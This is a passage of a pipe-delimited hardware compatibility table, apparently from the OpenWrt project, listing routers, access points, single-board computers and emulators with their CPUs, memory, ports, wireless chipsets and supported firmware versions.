353 | WiFi Router | NETGEAR | RBR50 | unknown 2022 | snapshot | Qualcomm Atheros IPQ4019 | 717 | 4 | 4096 eMMC | 512 | – | 4 | b/g/n | a/n/ac | Qualcomm Atheros IPQ4019, Qualcomm Atheros QCA9984 | – | 1x 2.0 | http://¿ | View/Edit data | |||||
354 | WiFi Router | NETGEAR | RBS50 | unknown 2022 | snapshot | Qualcomm Atheros IPQ4019 | 717 | 4 | 4096 eMMC | 512 | – | 4 | b/g/n | a/n/ac | Qualcomm Atheros IPQ4019, Qualcomm Atheros QCA9984 | – | 1x 2.0 | http://¿ | View/Edit data | |||||
355 | WiFi Router | NETGEAR | WNDR4300TN | unknown 2022 | 21.02.3 | Atheros AR9344 | ¿ | 1 | 128NAND | 128 | – | 4 | ¿ | ¿ | Atheros AR9344, Atheros AR9580 | – | – | http://¿ | View/Edit data | |||||
356 | Single Board Computer | NXP | LS1012ARDB | Available 2022 | 18.06.9 | NXP LS1012A | 800 | 1 | 128, 4096 | 1024 | – | 2 | b/g/n | – | SDIO WiFi module | – | 1x 3.0 | https://www.nxp.com/products/microcontrollers-and-processors/arm-processors/qoriq-layerscape-arm-processors/qoriq-ls1012a-reference-design-board:LS1012A-RDB | View/Edit data | |||||
357 | Single Board Computer | NXP | P2020RDB | Available 2020 | 21.02.3 | SD card, Switch is unmanaged | NXP P2020E | 1200 | 2 | 16, 32NAND, SDHC | 1024 | – | 6 | – | – | – | – | 1x 2.0 | https://www.nxp.com/design/qoriq-developer-resources/p2020-reference-design-board:P2020RDB | View/Edit data | ||||
358 | Single Board Computer | NXP | LS1046ARDB | Available 2020 | 21.02.3 | NXP LS1046A | 1600 | 4 | 128, 4096, 512NAND | 8192 | – | 4 | – | – | – | – | 2x 3.0 | http://www.nxp.com/products/microcontrollers-and-processors/arm-processors/qoriq-layerscape-arm-processors/qoriq-ls1046a-reference-design-board:LS1046A-RDB | View/Edit data | |||||
359 | Single Board Computer | NXP | LS1088A-RDB | Available 2022 | 18.06.4 | NXP LS1088A | 1800 | 8 | 128 | 8192 | – | 8 | – | – | – | – | 2x 3.0 | https://www.nxp.com/products/software-and-tools/software-development-tools/codewarrior-development-tools/suite-for-networked-applications/qoriq-ls1088a-rdb-reference-design-board:LS1088A-RDB | ls1088a-rdb | View/Edit data | ||||
360 | Single Board Computer | NXP | LS1043ARDB | Available 2022 | 18.06.9 | NXP LS1043A | 1600 | 4 | 128 | 2048 | – | 6 | – | – | – | – | 1x 2.0, 2x 3.0 | http://www.nxp.com/products/microcontrollers-and-processors/arm-processors/qoriq-layerscape-arm-processors/qoriq-layerscape-1043a-and-1023a-multicore-communications-processors:LS1043A | View/Edit data | |||||
361 | Single Board Computer | Olimex | A13-OLinuXino-WIFI | Available 2022 | 21.02.3 | Allwinner A13 | 1000 | 1 | 4096NAND, microSD | 512 | – | – | b/g/n | – | – | 3x 2.0 | https://www.olimex.com/Products/OLinuXino/A13/A13-OLinuXino-WIFI/open-source-hardware | a13-olinuxino | View/Edit data | |||||
362 | Single Board Computer | Olimex | A10-OLinuXino-LIME | Available 2022 | 21.02.3 | Allwinner A10 | 1000 | 1 | microSD | 512 | 1 | – | – | – | – | – | 2x 2.0 | https://www.olimex.com/Products/OLinuXino/A10/A10-OLinuXino-LIME/open-source-hardware | a10-olinuxino-lime | View/Edit data | ||||
363 | Single Board Computer | Olimex | A20-OLinuXino-LIME2 | Available 2022 | 21.02.3 | Allwinner A20 | 1000 | 2 | microSDHC | 1024 | – | 1 | – | – | – | – | 1x OTG, 2x 2.0 | https://www.olimex.com/Products/OLinuXino/A20/A20-OLinuXino-LIME2/ | a20-olinuxino-lime2 | View/Edit data | ||||
364 | Single Board Computer | Olimex | A20-OLinuXino-LIME | Available 2022 | 21.02.3 | Allwinner A20 | 1000 | 2 | microSD | 512 | 1 | – | – | – | – | – | 1x OTG, 2x 2.0 | https://www.olimex.com/Products/OLinuXino/A20/A20-OLinuXino-LIME/ | a20-olinuxino-lime | View/Edit data | ||||
365 | Single Board Computer | Olimex | A13-SOM-512 | Available 2022 | 21.02.3 | Allwinner A13 | 1000 | 1 | 4096NAND, microSD | 512 | ¿ | ¿ | – | – | – | – | – | https://www.olimex.com/Products/SOM/A13/A13-SOM-512/ | a13-som | View/Edit data | ||||
366 | Single Board Computer | Olimex | A20-OLinuXino-MICRO | Available 2022 | 21.02.3 | Allwinner A20 | 1000 | 2 | 4096NAND, microSD, SD | 1024 | 1 | – | – | – | – | – | 2x 2.0 | https://www.olimex.com/Products/OLinuXino/A20/A20-OLinuXino-MICRO/open-source-hardware | a20-olinuxino-micro | View/Edit data | ||||
367 | Single Board Computer | Olimex | A64-OLinuXino | Available 2020 | 21.02.3 | Allwinner A64 | 1200 | 4 | 4096 eMMC, microSDHC, more than 8GB eMMC | 2048 | – | 1 | b/g/n | – | Realtek RTL8723BS | – | 1x 2.0, 1x OTG | https://www.olimex.com/Products/OLinuXino/A64/A64-OLinuXino/ | View/Edit data | |||||
368 | Single Board Computer | Onion | Omega2 | Available 2022 | 21.02.3 | MediaTek MT7688AN | 580 | 1 | 32, microSD | 128 | 1 | – | b/g/n | – | MediaTek MT7688AN | – | 1x 2.0 | https://onion.io | View/Edit data | |||||
369 | WiFi AP | Open-Mesh | A40 | unknown 2021 | snapshot | Qualcomm Atheros QCA9558 | 720 | 1 | 16 | 128 | – | 2 | b/g/n | a/n/ac | Qualcomm Atheros QCA9558, Qualcomm Atheros QCA9882 | – | 1x 2.0 | http://¿ | View/Edit data | |||||
370 | WiFi AP | Open-Mesh | MR900 | v2 | unknown 2021 | 21.02.3 | Qualcomm Atheros QCA9558 | 720 | 1 | 16 | 128 | – | 1 | b/g/n | a/n | Qualcomm Atheros QCA9558, Qualcomm Atheros QCA9580 (mini-PCIe) | – | – | http://¿ | View/Edit data | ||||
371 | WiFi AP | Open-Mesh | MR1750 | v2 | unknown 2021 | 21.02.3 | Qualcomm Atheros QCA9558 | 720 | 1 | 16 | 128 | – | 1 | b/g/n | a/n/ac | ¿ | – | – | http://¿ | View/Edit data | ||||
372 | WiFi AP | Open-Mesh | OM5P-AC | v2 | unknown 2021 | 21.02.3 | ¿ | ¿ | ¿ | ¿ | ¿ | ¿ | ¿ | ¿ | ¿ | ¿ | ¿ | ¿ | http://¿ | View/Edit data | ||||
373 | WiFi AP | Open-Mesh | A42 | Available 2022 | 21.02.3 | Qualcomm Atheros IPQ4018 | 717 | 4 | 32 | 256 | – | 2 | b/g/n | a/n/ac | Qualcomm Atheros IPQ4018 | – | 1x 3.0 | https://www.openmesh.com/resource-downloads/A42_Datasheet.pdf | View/Edit data | |||||
374 | WiFi AP | Open-Mesh | OM5P-AC | Available 2022 | 19.07.10 | Qualcomm Atheros QCA9557 | 720 | 1 | 16 | 128 | – | 2 | b/g/n | a/n/ac | Qualcomm Atheros QCA9882 | – | – | http://www.open-mesh.com/products/grp-om5p-ac-cloud-access-point.html | View/Edit data | |||||
375 | WiFi AP | Open-Mesh | A62 | Available 2022 | 21.02.3 | Qualcomm IPQ4019 | 716 | 4 | 32 | 256 | – | 2 | b/g/n | a/n/ac | Qualcomm Atheros QCA9888, Qualcomm IPQ4019 | – | 1x 2.0 | https://store.openmesh.com/products/a62-universal-tri-band-802-11ac-wave-2-cloud-managed-wifi-access-point.html | View/Edit data | |||||
376 | WiFi Router | OrayBox | X3A | Available 2022 | snapshot | MediaTek MT7621AT | 880 | 2 | 16 | 128 | – | 3 | b/g/n | a/n/ac | MediaTek MT7615DN | – | – | https://pgy.oray.com/router/x3a.html | View/Edit data | |||||
377 | WiFi Router | P&W | R619AC | unknown 2021 | snapshot | IPQ4019 | 716 | 4 | 128NAND, 16 | 512 | – | 5 | b/g/n | a/n/ac | IPQ40xx | – | 1x 3.0 | http://¿ | View/Edit data | |||||
378 | Switch | Panasonic | Switch-M8eG PN28080K | unknown 2022 | snapshot | Realtek RTL8380M | 500 | 1 | 32 | 128 | – | 9 | – | – | – | – | – | http://¿ | View/Edit data | |||||
379 | Router | PC Engines | APU2C4 | Available 2022 | 21.02.3 | AMD GX-412TC | 1000 | 4 | SD | 4096 | – | 3 | – | – | 2 miniPCI express for add in cards | – | – | 2x 3.0 | http://www.pcengines.ch/apu2c4.htm | apu2 | View/Edit data | |||
380 | Router | PC Engines | APU3C4 | Available 2022 | 21.02.3 | AMD GX-412TC | 1000 | 4 | SD | 4096 | – | 3 | – | – | – | – | 2x 3.0 | http://pcengines.ch/apu3c4.htm | apu3 | View/Edit data | ||||
381 | Router | PC Engines | APU3C2 | Available 2022 | 21.02.3 | AMD GX-412TC | 1000 | 4 | SD | 2048 | – | 3 | – | – | – | – | 2x 3.0 | http://pcengines.ch/apu3c2.htm | apu3 | View/Edit data | ||||
382 | Router | PC Engines | APU3A2 | Available 2022 | 21.02.3 | AMD GX-412TC | 1000 | 4 | SD | 2048 | – | 3 | – | – | 2 miniPCI express for add in cards | – | – | 2x 3.0 | http://www.pcengines.ch/apu3a2.htm | apu3 | View/Edit data | |||
383 | Router | PC Engines | APU2C2 | Available 2022 | 21.02.3 | AMD GX-412TC | 1000 | 4 | SD | 2048 | – | 3 | – | – | 2 miniPCI express for add in cards | – | – | 2x 3.0 | http://www.pcengines.ch/apu2c2.htm | apu2 | View/Edit data | |||
384 | Router | PC Engines | APU2C0 | Available 2022 | 21.02.3 | AMD GX-412TC | 1000 | 4 | SD | 2048 | – | 2 | – | – | 2 miniPCI express for add in cards | – | – | 2x 3.0 | http://www.pcengines.ch/apu2c0.htm | apu2 | View/Edit data | |||
385 | Router | PC Engines | APU1D | Available 2022 | 21.02.3 | AMD T40E | 800 | 2 | SD | 2048 | – | 3 | – | – | 2x mini-PCIe | – | – | 2x 2.0 | http://www.pcengines.ch/apu1d.htm | apu | View/Edit data | |||
386 | Single Board Computer | PC Engines | APU4D4 | Available 2022 | 21.02.3 | AMD Embedded G series GX-412TC | 1000 | 4 | SDHC | 4096 | – | 4 | – | – | 1x (mini-)PCI(e), 2x (mini-)PCI(e) USB SIM | – | 2x 3.0 | https://www.pcengines.ch/apu4d4.htm | apu4 | View/Edit data | ||||
387 | WiFi Router | PHICOMM | K2P | A1, A2 | unknown 2022 | 21.02.3 | Concurrent 2.4GHz and 5GHz WiFi | MediaTek MT7621AT | 880 | 2 | 16 | 128 | – | 5 | b/g/n | a/n/ac | Concurrent operation on 2.4 GHz and 5 GHz not yet supported by the driver | MediaTek MT7615D | – | – | http://www.phicomm.com/cn/en.php/News/detail/cateid/2/id/435.html | k2p_ke2p | View/Edit data | |
388 | WiFi Router | PHICOMM | KE2P | C1 | Available 2022 | 21.02.3 | Concurrent 2.4GHz and 5GHz WiFi | MediaTek MT7621A | 880 | 2 | 16 | 128 | – | 5 | b/g/n | a/n/ac | Concurrent operation on 2.4 GHz and 5 GHz not yet supported by the driver | MediaTek MT7615D | – | – | https://www.phicomm.de/en/product/smart-home-products/smart-wlan-routers/ke2p | k2p_ke2p | View/Edit data | |
389 | WiFi Router | PHICOMM | K3 | A1 | Available 2022 | 21.02.3 | Broadcom BCM4709C0 | 1400 | 2 | 128 | 512 | – | 4 | b/g/n | a/n/ac | Broadcom BCM4366 (PCIe) | – | 1x 3.0 | http://www.phicomm.com/us/index.php/Products/family_details/cateid/18/id/121.html | k3_a1 | View/Edit data | |||
390 | Single Board Computer | Pine64 | PINE A64 | Available 2020 | 21.02.3 | Allwinner A64 | 1152 | 4 | microSDHC | 1024 | – | 1 | – | – | optional wlan/bluetooth module with chipset RTL8723BS | – | – | 2x 2.0 | https://www.pine64.org/devices/single-board-computers/pine-a64/ | pine_a64plus | View/Edit data | |||
391 | Single Board Computer | Pine64 | RockPro64 | 2.1 | Available 2020 | 21.02.3 | Rockchip RK3399 | 1800 | 6 | 16, eMMC, microSD | 4096 | – | 1 | – | – | – | – | 2x 2.0, 2x 3.0 | https://wiki.pine64.org/index.php/ROCKPro64 | rockpro64_v2.1 | View/Edit data | |||
392 | Single Board Computer | Pine64 | SOPINE A64 | Available 2022 | 21.02.3 | Allwinner A64 | 1200 | 4 | 16, microSDXC | 2048 | ¿ | ¿ | – | – | optional WiFi/BT module | – | ¿ | https://www.pine64.org/?page_id=1491 | View/Edit data | |||||
393 | Router | Planex | VR500 | Available 2022 | 21.02.3 | MediaTek MT7621A | 880 | 2 | 64 | 256 | – | 5 | – | – | – | – | 1x 2.0, 1x 3.0 | https://www.planex.co.jp/products/vr500/spec.shtml | View/Edit data | |||||
394 | WiFi Router | Planex | DB-WRT01 | unknown 2022 | 21.02.3 | MediaTek MT7620A | 580 | 1 | ¿ | ¿ | 2 | – | b/g/n | – | ¿ | – | 1x µUSB (power) | http://www.planex.co.jp/products/db-wrt01/spec.shtml | View/Edit data | |||||
395 | WiFi AP | Plasma Cloud | PA1200 | unknown 2020 | 21.02.3 | Qualcomm IPQ4018 | ¿ | 4 | 32 | 256 | – | 2 | b/g/n | a/n/ac | Qualcomm Atheros QCA4019 | – | 1x 3.0 | https://www.plasma-cloud.com/product-detail/pa1200/ | View/Edit data | |||||
396 | WiFi AP | Plasma Cloud | PA2200 | unknown 2020 | 21.02.3 | Qualcomm IPQ4019 | ¿ | 4 | 32 | 256 | – | 2 | b/g/n | a/n/ac | Qualcomm Atheros QCA4019, Qualcomm Atheros QCA9888 | – | – | https://www.plasma-cloud.com/product-detail/pa2200/ | View/Edit data | |||||
397 | Router | PlatHome | OpenBlocks AX3-4 | Available 2022 | 21.02.3 | Marvell Armada XP MV78260 | 1333 | 2 | 128 | 1024 | – | 4 | – | – | WLAN optionally available | – | – | 1x 2.0 | http://openblocks.plathome.co.jp/products/obs_a/ax3/ | View/Edit data | ||||
398 | Emulator | QEMU (armvirt) | qemu-system-arm | 0.12.5 | Available 2022 | 15.05.1 | armvirt | Emulator | 1 | ¿ | ¿ | ¿ | ¿ | – | – | – | – | ¿ | https://www.qemu.org/ | qemu | View/Edit data | |||
399 | Emulator | QEMU (i386) | qemu-system-i386 | 0.12.5 | Available 2022 | 15.05.1 | x86 kvm_guest | Emulator | 1 | ¿ | ¿ | ¿ | ¿ | – | – | – | – | ¿ | https://www.qemu.org/ | qemu | View/Edit data | |||
400 | Emulator | QEMU (malta) | qemu-system-mips(el) | 0.12.5 | Available 2022 | 15.05.1 | malta | Emulator | 1 | ¿ | ¿ | ¿ | ¿ | – | – | – | – | ¿ | https://www.qemu.org/ | qemu | View/Edit data | |||
401 | Emulator | QEMU (x86_64) | qemu-system-x86_64 | >2.0 | Available 2022 | 15.05.1 | kvm x86_64 | 1 | ¿ | ¿ | ¿ | ¿ | ¿ | ¿ | ¿ | – | ¿ | https://www.qemu.org/ | qemu | View/Edit data | ||||
402 | WiFi AP | Qxwlan | E600G | v2 | unknown 2022 | 21.02.1 | Qualcomm Atheros QCA9531 | 650 | 1 | 16, 8 | 128 | 2 | – | b/g/n | – | Qualcomm Atheros QCA9531 | – | – | http://www.qxwlan.com/product/p/15.html | e600g | View/Edit data | |||
403 | WiFi Router | Qxwlan | E2600AC | C2 | unknown 2022 | 21.02.3 | Qualcomm IPQ4019 | ¿ | 4 | 16 | 256 | – | 3 | b/g/n | a/n/ac | Qualcomm Atheros IPQ4019 | – | 1x 3.0 | http://qxwlan.com/product/p/91.html | e2600ac | View/Edit data | |||
404 | WiFi Router | Qxwlan | E558 | v2 16M | unknown 2022 | 21.02.3 | Qualcomm Atheros QCA9558 | 720 | 1 | 16 | 128 | – | 3 | b/g/n | – | Qualcomm Atheros QCA9558 | – | – | http://www.qxwlan.com/product/p/97.html | e558 | View/Edit data | |||
405 | WiFi AP | Qxwlan | E600GAC | v2 | unknown 2022 | 21.02.1 | Qualcomm Atheros QCA9531 | 650 | 1 | 16 | 128 | 4 | – | b/g/n | – | Qualcomm Atheros QCA9531, Qualcomm Atheros QCA9887 | – | 1x Header | http://www.qxwlan.com/product/p/79.html | e600gac | View/Edit data | |||
406 | WiFi Router | Qxwlan | E750A | v4 16M | unknown 2022 | 21.02.3 | Atheros AR9344 | 560 | 1 | 16 | 128 | 2 | – | – | a/n | Atheros AR9344 | – | 1x Header | http://www.qxwlan.com/product/p/74.html | e750a | View/Edit data | |||
407 | WiFi AP | Qxwlan | E750G | v8 16M | unknown 2022 | 21.02.3 | Atheros AR9344 | 560 | 1 | 16 | 128 | 2 | 2 | b/g/n | – | Atheros AR9344 | – | 1x Header | http://www.qxwlan.com/product/p/75.html | e750g | View/Edit data | |||
408 | WiFi AP | Qxwlan | E1700AC | v2 | unknown 2022 | 21.02.1 | Qualcomm Atheros QCA9563 | 750 | 1 | 16, 8 | 128 | – | 2 | b/g/n | a/n/ac | Qualcomm Atheros QCA9563, Qualcomm Atheros QCA9880 | ¿ | 1x 2.0 | http://www.qxwlan.com/product/p/46.html | e1700ac | View/Edit data | |||
409 | WiFi Router | Qxwlan | E2600AC | C1 | unknown 2022 | 21.02.3 | Qualcomm IPQ4019 | ¿ | 4 | 32 | 256 | – | 3 | b/g/n | a/n/ac | Qualcomm IPQ4019 | – | 1x 3.0 | http://qxwlan.com/product/p/91.html | View/Edit data | ||||
410 | Single Board Computer | Radxa | ROCK Pi 4 | B | unknown 2020 | 21.02.3 | Bluetooth, Wifi 5GHz | Rockchip RK3399 | 1800 | 6 | 8192 eMMC, microSDXC | 4 | – | 1 | ¿ | a/n/ac | ¿ | – | 2x 2.0, 2x 3.0 | https://wiki.radxa.com/Rockpi4 | View/Edit data | |||
411 | NAS | RaidSonic | IB-NAS62x0 | unknown 2022 | 21.02.3 | Marvell 88F6281 | 1200 | 1 | 256NAND | 256 | – | 1 | – | – | – | – | 3x 2.0 | View/Edit data | ||||||
412 | WiFi Router | RAISECOM | MSG1500 X.00 | unknown 2022 | snapshot | MediaTek MT7621AT | 880 | 2 | 128NAND | 256 | – | 5 | ¿ | ¿ | MediaTek MT7615DN | – | 1x 2.0 | http://¿ | View/Edit data | |||||
413 | Single Board Computer | Raspberry Pi Foundation | Raspberry Pi 2 | B 1.0/1.1 | Available 2022 | 21.02.3 | Broadcom BCM2836 | 900 | 4 | microSD | 1024 | 1 | – | – | – | – | – | 4x 2.0 | https://www.raspberrypi.org/products/raspberry-pi-2-model-b/ | raspberry_pi | https://forum.openwrt.org/viewtopic.php?id=56397 | View/Edit data | ||
414 | Single Board Computer | Raspberry Pi Foundation | Raspberry Pi 2 | B 1.2 | Available 2022 | 21.02.3 | Broadcom BCM2837A0 | 900 | 4 | microSD | 1024 | 1 | – | – | – | – | – | 4x 2.0 | https://www.raspberrypi.org/products/raspberry-pi-2-model-b/ | raspberry_pi | https://forum.openwrt.org/viewtopic.php?id=56397 | View/Edit data | ||
415 | Single Board Computer | Raspberry Pi Foundation | Raspberry Pi 3 | B | Available 2022 | 21.02.3 | Country Code setting | Broadcom BCM2837A0 | 1200 | 4 | microSD, microSDHC | 1024 | 1 | – | b/g/n | – | Broadcom BCM43438 | – | 1x µUSB (power), 4x 2.0 | https://www.raspberrypi.org/products/raspberry-pi-3-model-b/ | raspberry_pi | View/Edit data | ||
416 | Single Board Computer | Raspberry Pi Foundation | Raspberry Pi 3 | B | Available 2022 | 21.02.3 | Country Code setting, WiFi 2.4GHz (work in snapshot), WIP | Broadcom BCM2837B0 | 1400 | 4 | microSD | 1024 | – | 1 | b/g/n | a/n/ac | Cypress CYW43455 | – | 1x µUSB (power), 4x 2.0 | https://www.raspberrypi.org/products/raspberry-pi-3-model-b-plus/ | raspberry_pi | https://forum.openwrt.org/t/18-06-on-raspberry-pi-3-b/18670/10 | View/Edit data | |
417 | Single Board Computer | Raspberry Pi Foundation | Raspberry Pi | B | Available 2022 | 21.02.3 | Broadcom BCM2835 | 700 | 1 | SD | 512 | 1 | – | – | – | – | – | 2x 2.0 | raspberry_pi | View/Edit data | ||||
418 | Single Board Computer | Raspberry Pi Foundation | Raspberry Pi | B | Available 2022 | 21.02.3 | Broadcom BCM2835 | 700 | 1 | microSD | 512 | 1 | – | – | – | – | – | 4x 2.0 | https://www.raspberrypi.org/products/raspberry-pi-1-model-b-plus/ | raspberry_pi | View/Edit data | |||
419 | Single Board Computer | Raspberry Pi Foundation | Raspberry Pi 4 | B | Available 2020 | 21.02.3 | Broadcom BCM2711 | 1500 | 4 | microSDXC | 8192 | – | 1 | b/g/n | a/n/ac | SDIO connected | Cypress CYW43455 | – | 1x OTG, 2x 2.0, 2x 3.0 | https://www.raspberrypi.com/products/raspberry-pi-4-model-b/ | raspberry_pi | https://forum.openwrt.org/t/rpi4-community-build/69998 | View/Edit data | |
420 | Single Board Computer | Raspberry Pi Foundation | Raspberry Pi 4 | 400 | Available 2020 | 21.02.3 | Broadcom BCM2711 | 2000 | 4 | SDHC | 4096 | – | 1 | b/g/n | a/n/ac | SDIO connected | Cypress CYW43456 | – | 1x 2.0, 1x OTG, 2x 3.0 | https://www.raspberrypi.org/products/raspberry-pi-400/ | raspberry_pi | View/Edit data | ||
421 | Single Board Computer | Raspberry Pi Foundation | Raspberry Pi 3 | Compute Module 3 | Available 2022 | 21.02.3 | Broadcom BCM2837 | 1200 | 4 | microSD, microSDHC | 1024 | – | – | – | – | – | – | 1x 2.0 | https://www.raspberrypi.org/products/compute-module-3/ | raspberry_pi | View/Edit data | |||
422 | Single Board Computer | Raspberry Pi Foundation | Raspberry Pi 4 | Compute Module 4 | Available 2020 | 21.02.3 | Broadcom BCM2711 | 1500 | 4 | microSDXC | 8192 | – | 1 | b/g/n | a/n/ac | SDIO connected | Cypress CYW43456 | – | 1x OTG, 2x 2.0 | https://www.raspberrypi.org/products/compute-module-4 | raspberry_pi | View/Edit data | ||
423 | Single Board Computer | Raspberry Pi Foundation | Raspberry Pi | Zero | Available 2022 | 21.02.3 | Broadcom BCM2835 | 1000 | 1 | microSD | 512 | – | – | – | – | – | – | 1x OTG, 1x µUSB (power) | https://www.raspberrypi.org/products/raspberry-pi-zero/ | raspberry_pi | View/Edit data | |||
424 | Single Board Computer | Raspberry Pi Foundation | Raspberry Pi | Zero W | Available 2022 | 21.02.3 | Broadcom BCM2835 | 1000 | 1 | microSD | 512 | – | – | b/g/n | – | Broadcom BCM43143 | – | 1x OTG, 1x µUSB (power) | https://www.raspberrypi.org/products/raspberry-pi-zero-w/ | raspberry_pi | View/Edit data | |||
425 | WiFi AP | Renkforce | WS-WN530HP3-A | unknown 2022 | snapshot | MediaTek MT7621DAT | 880 | 2 | 16 | 128 | – | 3 | ¿ | ¿ | MediaTek MT603EN, MediaTek MT613BEN | – | – | http://¿ | View/Edit data | |||||
426 | WiFi Router | Roqos | Core RC10 | unknown 2021 | snapshot | Intel Atom E3845 | 1900 | 4 | 8192 eMMC | 2048 | – | 5 | b/g/n | a/n/ac | Atheros AR9287 (mini-PCIe), Qualcomm Atheros QCA9880 (mini-PCIe) | – | 1x 3.0 | https://www.roqos.com/rc10.html | View/Edit data | |||||
427 | unknown | ROSINSON | WR818 | unknown 2022 | 21.02.3 | Qualcomm Atheros QCA9563 | ¿ | 1 | 16 | ¿ | ¿ | ¿ | b/g/n | – | Qualcomm Atheros QCA9563 | ¿ | 2x 2.0 | View/Edit data | ||||||
428 | WiFi Router | Ruijie | RG-EW3200GX PRO | unknown 2022 | snapshot | MediaTek MT7622B | 1350 | 2 | 16 | 256 | – | 5 | ¿ | ¿ | MediaTek MT7622, MediaTek MT7911AN, MediaTek MT7975AN | – | – | http://¿ | View/Edit data | |||||
429 | WiFi Router | SamKnows | SK-WB8 | Available 2022 | 21.02.3 | MediaTek MT7621A | 880 | 2 | 16 | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7603E, MediaTek MT7612E | – | 1x 2.0 | https://www.samknows.com/ | sk-wb8 | View/Edit data | ||||
430 | Single Board Computer | Samsung | TQ210 | unknown 2022 | 19.07.10 | Samsung S5PV210 | 1000 | ¿ | 1024NAND, microSD, SD | 1024 | 1 | – | – | – | – | – | 1x OTG, 3x 2.0 | View/Edit data | ||||||
431 | WiFi Router | Sercomm | H500-s vfes | v1 | Available 2022 | 21.02.3 | DSL modem, FXS, WiFi 2.4GHz | Broadcom BCM63167 | 400 | 2 | 128NAND | 128 | – | 4 | b/g/n | a/n/ac | Broadcom BCM435f, Quantenna QT3740BC | xDSL | 1x 2.0 | h500-s | View/Edit data | |||
432 | WiFi Router | Sercomm | H500-s lowi | v1 | Available 2022 | 21.02.3 | DSL modem, WiFi 2.4GHz | Broadcom BCM63167 | 400 | 2 | 128NAND | 128 | – | 4 | b/g/n | a/n/ac | Broadcom BCM435f; Quantenna QT3740BC | xDSL | 1x 2.0 | h500-s | View/Edit data | |||
433 | other | Sercomm | NA502 | unknown 2021 | 21.02.3 | MediaTek MT7621ST | 880 | 1 | 128NAND | 256 | – | 1 | b/g/n | a/n/ac | MediaTek MT7603EN, MediaTek MT7662EN | – | 1x 2.0 | https://www.sercomm.com/contpage.aspx?langid=1&type=prod3&L1id=2&L2id=3&L3id=7&Prodid=444 | na502 | View/Edit data | ||||
434 | WiFi AP | Siemens | WS-AP3610 | Available 2020 | 21.02.3 | Atheros AR7161 | 680 | 1 | 16 | 128 | – | 1 | b/g/n | a/n | Atheros AR9160 | – | – | http://¿ | ws-ap3610_ws-ap3620 | View/Edit data | ||||
435 | Single Board Computer | Sinovoip | Banana Pi R2 | 1.2 | Available 2021 | 19.07.10 | Bluetooth, WiFi 2.4GHz | MediaTek MT7623N | 1300 | 4 | 8192 eMMC, microSD | 2048 | – | 5 | b/g/n | a/n | MediaTek MT6625LN | – | 1x OTG, 2x 3.0 | http://www.banana-pi.com/eacp_view.asp?id=104 | banana_pi_r2 | View/Edit data | ||
436 | WiFi Router | Sinovoip | Banana Pi BPi-R64 | V1.1 | Available 2021 | snapshot | MT7622AV | 1350 | 2 | 8192 eMMC | 1024 | – | 5 | b/g/n | – | MediaTek MT7622AV | – | 1x 3.0 | http://www.banana-pi.org/r64.html | bananapi_bpi-r64_v1.1 | View/Edit data | |||
437 | Single Board Computer | Sinovoip | Banana Pi M2 Ultra | BPI-M2U | Available 2022 | snapshot | eMMC, WiFi 2.4GHz | Allwinner R40 | 1200 | 4 | microSD | 2048 | – | 1 | b/g/n | – | AMPAK AP6212 | – | 2x 2.0 | http://www.banana-pi.org/m2u.html | https://forum.openwrt.org/t/adding-support-for-the-banana-pi-m2-ultra/44379 | View/Edit data | ||
438 | Single Board Computer | Sinovoip | Banana Pi M2 Plus | M2PLUS-H3 | Available 2022 | 21.02.3 | Audio (untested), Bluetooth, Video (untested) | Allwinner H3 | 1000 | 4 | 8192 | 1024 | – | 1 | b/g/n | – | Broadcom 43430a0 chip | Ampak AP6212 | – | 1x 2.0 Device, 2x 2.0 | https://www.banana-pi.org/banana-pi-sbcs/45.html | banana_pi_m2_plus | View/Edit data | |
439 | Single Board Computer | Sinovoip | Banana Pi M2 Berry | unknown 2021 | snapshot | Allwinner V40 | 1200 | 4 | microSD | 1024 | – | 1 | b/g/n | – | AMPAK AP6212 | – | 1x OTG, 1x µUSB (power), 4x 2.0 | http://wiki.banana-pi.org/Banana_Pi_BPI-M2_Berry | View/Edit data | |||||
440 | WiFi Router | Sky | SR102 | unknown 2022 | 21.02.3 | DSL modem, WiFi 2.4GHz | Broadcom BCM63168 | 400 | 2 | 16 | 128 | 4 | – | b/g/n | – | Broadcom BCM435F | ADSL2 | – | sr102 | View/Edit data | ||||
441 | Single Board Computer | Soekris | net5501 | 70 | unknown 2021 | 19.07.7 | AMD Geode LX800 | 500 | 1 | CF card | 512 | 4 | – | – | – | – | 1x 2.0, 1x Header | http://¿ | View/Edit data | |||||
442 | Single Board Computer | Soekris | net5501 | 60 | unknown 2021 | 19.07.7 | AMD Geode LX800 | 433 | 1 | CF card | 256 | 4 | – | – | – | – | 1x 2.0, 1x Header | http://¿ | View/Edit data | |||||
443 | Single Board Computer | SolidRun | CuBox i2 | Available 2020 | 21.02.3 | NXP i.MX6 Dual Lite | 1000 | 2 | microSD | 1024 | 1 | – | – | – | – | – | 2x 2.0 | https://www.solid-run.com/nxp-family/cubox-i/cubox-i-specifications/ | View/Edit data | |||||
444 | Router | SolidRun | ClearFog Base | Available 2020 | 21.02.3 | Marvell Armada 380 | 1600 | 2 | microSD | 1024 | – | 2 | – | – | – | – | 1x 3.0 | https://wiki.solid-run.com/doku.php?id=products:a38x:clearfog | clearfog | View/Edit data | ||||
445 | Single Board Computer | SolidRun | CuBox i2eX | Available 2020 | 21.02.3 | NXP i.MX6 Dual | 1000 | 2 | microSD | 1024 | – | 1 | – | – | – | – | 2x 2.0 | https://www.solid-run.com/nxp-family/cubox-i/cubox-i-specifications/ | View/Edit data | |||||
446 | Router | SolidRun | ClearFog Pro | v2.1 | Available 2020 | 21.02.3 | Marvell Armada 380 | 1600 | 2 | microSD | 1024 | – | 6 | – | – | – | – | 1x 3.0 | http://wiki.solid-run.com/doku.php?id=products:a38x:clearfog | clearfog | http://forum.solid-run.com/software-f32/openwrt-chaos-calmer-15-05-or-trunk-t2939.html | View/Edit data | ||
447 | Single Board Computer | SolidRun | CuBox i1 | Available 2020 | 21.02.3 | NXP i.MX6 Solo | 1000 | 1 | microSD | 512 | 1 | – | – | – | – | – | 2x 2.0 | https://www.solid-run.com/nxp-family/cubox-i/cubox-i-specifications/ | View/Edit data | |||||
448 | Single Board Computer | SolidRun | CuBox i4Pro | Available 2020 | 21.02.3 | Bluetooth, WiFi 2.4GHz | NXP i.MX6 Quad | 1000 | 4 | microSD | 2048 | – | 1 | b/g/n | – | Broadcom BCM4329 | – | 2x 2.0 | https://www.solid-run.com/nxp-family/cubox-i/cubox-i-specifications/ | View/Edit data | ||||
